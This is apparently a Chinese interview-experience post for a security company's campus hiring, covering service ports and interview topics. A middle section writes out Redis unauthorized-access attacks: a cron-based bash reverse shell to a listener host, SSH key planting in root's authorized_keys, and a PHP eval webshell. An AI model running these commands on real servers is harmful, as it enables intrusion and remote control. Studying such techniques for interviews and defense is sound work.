某安全公司校招面试
1、自我介绍
这段时间,主要是面试官看你简历的时间,所以简历上写过的就从简,博主当时介绍了一下自己大学都干了什么(按时间线,有计划的去说)。
2、面试题
2.1、常用服务及端口号
HTTP:80
FTP:21
SSH:22
Telnet:23
SMTP:25
DNS: 53
whois++:63
POP2:109
POP3: 110
DHCP Client:546
DHCP Server:547
MSN:569
SSL:990
sqlserver:1433
Oracle:1521
MySql:3306
2.2、apache、iis、nginx解析漏洞
2.3、redis未授权访问的getshell方式
2.3.1、计划任务反弹shell
①、创建计划任务
redis-cli -h 192.168.2.6
set x “\n* * * * * bash -i >& /dev/tcp/192.168.1.1/4444 0>&1\n”
config set dir /var/spool/cron/
config set dbfilename root
save
②、本机监听
nc -lvv 4444
2.3.2、写入公钥远程连接
利用条件:root用户,未授权访问,开启ssh服务
①、本地生成秘钥
ssh-keygen -t rsa
②、将公钥写入一个文件
cd /root/.ssh/
(echo -e “\n\n”; cat id_rsa.pub; echo -e “\n\n”) > foo.txt
③、连接redis写入文件
cat foo.txt | redis-cli -h 210.73.90.xxx -x set crackit
redis-cli -h 210.73.90.xxx
210.73.90.xxx:6379> config set dir /root/.ssh/
OK
(1.39s)
210.73.90.xxx:6379> CONFIG GET dir
- “dir”
- “/root/.ssh”
210.73.90.xxx:6379> config set dbfilename “authorized_keys”
OK
(1.03s)
210.73.90.xxx:6379> SAVE
saOK
(1.40s)
210.73.90.xxx:6379> SAVE
OK
210.73.90.xxx:6379> exit
root@GanDolf:~/.ssh# ssh
④、连接服务器
ssh -i id_rsa root@210.73.90.xxx
2.3.3、网站绝对路径获取webshell
config set dir 绝对路径
config set dbfilename shell.php
set x “<?php @eval($_POST['test']);?>”
save
2.3.4、主从复制
①执行脚本
python3 redis-rogue-server.py --rhost --rport --lhost --lport
②执行命令
脚本这里就不贴了,有兴趣的自己百度。
2.4、各数据库命令执行函数
sql server的xp_cmdshell。
2.5、各常见漏洞的原理及防御
sql注入你对预处理有深入研究,就是加分项。
2.6、tcp三次握手与四次挥手
学习青柚师傅,这道题必满分。
https://blog.youkuaiyun.com/qq_38950316/article/details/81087809
2.7、真正的面试----根据你的简历所写,开始提问。
上面都是死问题的,大家可以自行百度。真正的面试,是从提问简历开始,所以一定要提前做好准备。答好简历上所写,才是重中之重。
本来还有一道大题,给了一些条件,然后问渗透工作该如何进行,但是记不太清问题了。不要慌,面试官会给你时间思考,只要做到有逻辑,基本就不会被pass。